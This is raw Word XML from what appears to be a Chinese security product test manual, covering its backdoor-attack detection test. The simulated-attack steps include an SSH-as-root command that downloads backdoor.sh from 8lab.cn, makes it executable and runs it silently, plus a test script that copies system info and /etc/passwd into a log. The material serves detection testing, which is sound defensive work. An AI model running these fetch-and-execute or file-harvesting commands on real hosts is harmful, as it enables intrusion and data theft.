          <w:p w14:paraId="18942E57" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CF059D5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB30E88" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F413C30" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="295" w:name="_Toc2063268988"/>
      <w:bookmarkStart w:id="296" w:name="_Toc36487929"/>
      <w:r w:rsidRPr="00536672">
        <w:t>后门攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="295"/>
      <w:bookmarkEnd w:id="296"/>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6823"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="061600DB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="359"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64AEF3E6"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23" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26CF9F10" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>后门攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5B2B3BFE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="473"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="152B9572" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4410FF9E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>无需额外的工具，通过提供的测试脚本模拟后门攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="10F1F6DA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24A9792F"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23" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149AC7DC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析各组件安全完毕，实时检测数据流正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5C7930A7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="9549"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D97B7F4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3078CC4E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>概述：在获取到shell通道后，需要在目标机器上实现提权，rootkit，隐蔽通道等一系列攻击，其中的后门可能会在后台远程的获取攻击指令，也有可能利用本地的计算和网络资源进行ddos和挖矿。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25429CD0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一次正常的后门攻击往往是在获得一个shell之后进行的，在获得登录shell或交互式shell之后通常会自动从网络上下载攻击脚本，执行后进行rootkit，自启动添加，远程指令等一系列攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07868E30" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50098ADF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>具体测试过程：通过如下命令模拟常见的后门攻击状态</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19217923" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>模拟攻击命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3430EB50" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53C02D5C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CFE862C" wp14:editId="0B6E0B85">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>56515</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>6350</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4078605" cy="1432560"/>
                      <wp:effectExtent l="6350" t="6350" r="29845" b="8890"/>
                      <wp:wrapNone/>
                      <wp:docPr id="6" name="Text Box 1"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr txBox="1"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1212850" y="4841240"/>
                                <a:ext cx="4078605" cy="1432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4EAF86" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:pPr>
                                    <w:pStyle w:val="8lab-7"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:t xml:space="preserve">  </w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>ssh</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> root@{host}  “Curl </w:t>
                                  </w:r>
                                  <w:hyperlink r:id="rId35" w:history="1">
                                    <w:r>
                                      <w:rPr>
                                        <w:rStyle w:val="af3"/>
                                      </w:rPr>
                                      <w:t>www.8lab.cn/backdoor.sh</w:t>
                                    </w:r>
                                  </w:hyperlink>
                                  <w:r>
                                    <w:t xml:space="preserve"> &gt; /tmp/backdoor.sh &amp;&amp;chmod a+x /tmp/backdoor.sh &amp;&amp; /tmp/backdoor.sh &gt; /dev/null 2&gt;&amp;1” </w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="09B0978D" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:pPr>
                                    <w:pStyle w:val="8lab-7"/>
                                  </w:pPr>
                                </w:p>
                                <w:p w14:paraId="56B2B70A" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRPr="00617C51" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:pPr>
                                    <w:pStyle w:val="8lab-7"/>
                                  </w:pPr>
                                  <w:r w:rsidRPr="00617C51">
                                    <w:t xml:space="preserve"> (登录-&gt;下载攻击脚本-&gt;赋予执行权限-&gt;执行攻击脚本并忽略输出）</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2124EB07" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:pPr>
                                    <w:pStyle w:val="8lab-7"/>
                                  </w:pPr>
                                </w:p>
                                <w:p w14:paraId="205930B4" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9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CFE862C" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                      <v:stroke joinstyle="miter"/>
                      <v:path gradientshapeok="t" o:connecttype="rect"/>
                    </v:shapetype>
                    <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:4.45pt;margin-top:.5pt;width:321.15pt;height:112.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5ThQIAAHcFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFFv2yAQfp+0/4B4Xx27TppFdaosVadJ&#10;1VqtnfZMMCRWgWNAYme/fgd20mbdS6e92MB993H3cXeXV51WZCecb8BUND8bUSIMh7ox64p+f7z5&#10;MKXEB2ZqpsCIiu6Fp1fz9+8uWzsTBWxA1cIRJDF+1tqKbkKwsyzzfCM082dghUGjBKdZwK1bZ7Vj&#10;LbJrlRWj0SRrwdXWARfe4+l1b6TzxC+l4OFOSi8CURXF2EL6uvRdxW82v2SztWN20/AhDPYPUWjW&#10;GLz0SHXNAiNb17yi0g134EGGMw46AykbLlIOmE0++iObhw2zIuWC4nh7lMn/P1r+dXfvSFNXdEKJ&#10;YRqf6FF0gXyCjuRRndb6GYIeLMJCh8f4yodzj4cx6U46Hf+YDon2Ii+mY1R7X9FyWuZFOegciTkC&#10;ytHFdDIaU8IRkZfnxXiSENkzlXU+fBagSVxU1OFDJn3Z7tYHDAuhB0i82YNq6ptGqbSJxSOWypEd&#10;w2dXIQWMHicoZUiLWZ9joK8YIvXRf6UYf4opnzLgThk8jAL1QqRV2CsR+ZT5JiQKi+kOF5xGxTgX&#10;5hhZQkc3iTm8xXHAR1eRyv0tzkePdDOYcHTWjQHX63Iadv10EFP2+IMCfd5RgtCtuqFwVlDvsW4c&#10;9H3nLb9pUNpb5sM9c9hoWCQ4PMIdfqQCfA8YVpRswP3623nEY/2jlZIWG7ei/ueWOUGJ+mKwMz7m&#10;JdYbCWlTji8K3LiXltVLi9nqJWCR5DimLE/LiA/qsJQO9A+cMYt4K5qY4Xh3RcNhuQz9OMEZxcVi&#10;kUDY25aFW/NgeaSO8hpYbAPIJhVvlKnXZpAPuzvV1zCJ4vh4uU+o53k5/w0AAP//AwBQSwMEFAAG&#10;AAgAAAAhACx2xPraAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyo00hE&#10;aYhTASpcONEizm68tSPidWS7afh7lhMcZ2c087bdLn4UM8Y0BFKwXhUgkPpgBrIKPg4vdzWIlDUZ&#10;PQZCBd+YYNtdX7W6MeFC7zjvsxVcQqnRClzOUyNl6h16nVZhQmLvFKLXmWW00kR94XI/yrIoKun1&#10;QLzg9ITPDvuv/dkr2D3Zje1rHd2uNsMwL5+nN/uq1O3N8vgAIuOS/8Lwi8/o0DHTMZzJJDEqqDcc&#10;5DM/xG51vy5BHBWUZVWB7Fr5n7/7AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAPJHlOF&#10;AgAAdwUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhACx2&#10;xPraAAAABwEAAA8AAAAAAAAAAAAAAAAA3wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AADmBQAAAAA=&#10;" fillcolor="white [3201]" strokeweight=".5pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="744EAF86" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:pPr>
                              <w:pStyle w:val="8lab-7"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">  </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>ssh</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> root@{host}  “Curl </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId36" w:history="1">
                              <w:r>
                                <w:rPr>
                                  <w:rStyle w:val="af3"/>
                                </w:rPr>
                                <w:t>www.8lab.cn/backdoor.sh</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r>
                              <w:t xml:space="preserve"> &gt; /tmp/backdoor.sh &amp;&amp;chmod a+x /tmp/backdoor.sh &amp;&amp; /tmp/backdoor.sh &gt; /dev/null 2&gt;&amp;1” </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="09B0978D" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:pPr>
                              <w:pStyle w:val="8lab-7"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="56B2B70A" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRPr="00617C51" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:pPr>
                              <w:pStyle w:val="8lab-7"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00617C51">
                              <w:t xml:space="preserve"> (登录-&gt;下载攻击脚本-&gt;赋予执行权限-&gt;执行攻击脚本并忽略输出）</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2124EB07" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:pPr>
                              <w:pStyle w:val="8lab-7"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="205930B4" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C"/>
                        </w:txbxContent>
                      </v:textbox>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E98FF56" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E8842B6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C7409FE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AB05939" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A5BB49A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B2C4A11" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17BCB660" wp14:editId="3DAD382C">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>635</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>395605</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4000500" cy="1506855"/>
                      <wp:effectExtent l="6350" t="6350" r="6350" b="10795"/>
                      <wp:wrapNone/>
                      <wp:docPr id="14" name="Text Box 2"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr txBox="1"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="4000500" cy="15068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5936FE" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>#!/</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t>bin/bash</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="6F9FAE8C" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:r>
                                    <w:t>#backdoor.sh</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5BF82FDD" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:r>
                                    <w:t>#this is test attack script</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5B5106A1" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>echo</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> `date` &gt;&gt; /tmp/attack.log </w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4E78240E" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>echo</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> `uname -a` &gt;&gt; /tmp/attack.log</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="720C178E" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>cat</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> /etc/passwd &gt;&gt; /tmp/attack.log</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="54F0A70F" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>echo</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t xml:space="preserve"> ‘================’ &gt;&gt; /tmp/attack.log</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2F45C9AF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9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BCB660" id="Text Box 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:.05pt;margin-top:31.15pt;width:315pt;height:118.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vDewIAAHMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFFv2yAQfp+0/4B4X+1kSddFcaosVadJ&#10;1VqtnfZMMDSowDEgsbNfvwPHbrL1pdNebOC++7j7uLv5ZWs02QkfFNiKjs5KSoTlUCv7WNHvD9fv&#10;LigJkdmaabCionsR6OXi7Zt542ZiDBvQtfAESWyYNa6imxjdrCgC3wjDwhk4YdEowRsWcesfi9qz&#10;BtmNLsZleV404GvngYsQ8PSqM9JF5pdS8HgrZRCR6IpibDF/ff6u07dYzNns0TO3UfwQBvuHKAxT&#10;Fi8dqK5YZGTr1V9URnEPAWQ842AKkFJxkXPAbEblH9ncb5gTORcUJ7hBpvD/aPnX3Z0nqsa3m1Bi&#10;mcE3ehBtJJ+gJeMkT+PCDFH3DnGxxWOE9ucBD1PWrfQm/TEfgnYUej+Im8g4Hk7KspyWaOJoG03L&#10;84vpNPEUz+7Oh/hZgCFpUVGPr5dFZbubEDtoD0m3BdCqvlZa502qGLHSnuwYvrWOOUgkP0FpS5qK&#10;nr+flpn4xJaoB/+1ZvzpEN4RCvm0xZiTKF3yeRX3WqQgtP0mJKqZNXghKsa5sENkGZ1QEnN4jeMB&#10;n1xFrvHXOA8e+WawcXA2yoLvdDkVs37qxZQdvlegyztJENt125VRXxtrqPdYMh66nguOXytU+IaF&#10;eMc8NhmWAg6OeIsfqQGfBQ4rSjbgf710nvBY+2ilpMGmrWj4uWVeUKK/WOyKj6PJJHV53kymH8a4&#10;8ceW9bHFbs0KsFZGOKIcz8uEj7pfSg/mB86XZboVTcxyvLuisV+uYjdKcD5xsVxmEPa1Y/HG3jue&#10;qJPKFpbbCFLlGk5qddocVMTOzl1wmEJpdBzvM+p5Vi5+AwAA//8DAFBLAwQUAAYACAAAACEAIXqg&#10;SNkAAAAHAQAADwAAAGRycy9kb3ducmV2LnhtbEyOvU7DMBSFdyTewbpIbNQhlaIkxKkKKixMFMR8&#10;G7u21fg6st00vD3uBOP50Tlft1ncyGYVovUk4HFVAFM0eGlJC/j6fH2ogcWEJHH0pAT8qAib/vam&#10;w1b6C32oeZ80yyMUWxRgUppazuNglMO48pOinB19cJiyDJrLgJc87kZeFkXFHVrKDwYn9WLUcNqf&#10;nYDds270UGMwu1paOy/fx3f9JsT93bJ9ApbUkv7KcMXP6NBnpoM/k4xsvGqWBFTlGlhOq3WRjYOA&#10;smkq4H3H//P3vwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQArbZvDewIAAHMFAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAheqBI2QAAAAcBAAAP&#10;AAAAAAAAAAAAAAAAANUEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" fillcolor="white [3201]" strokeweight=".5pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="6E5936FE" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>#!/</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
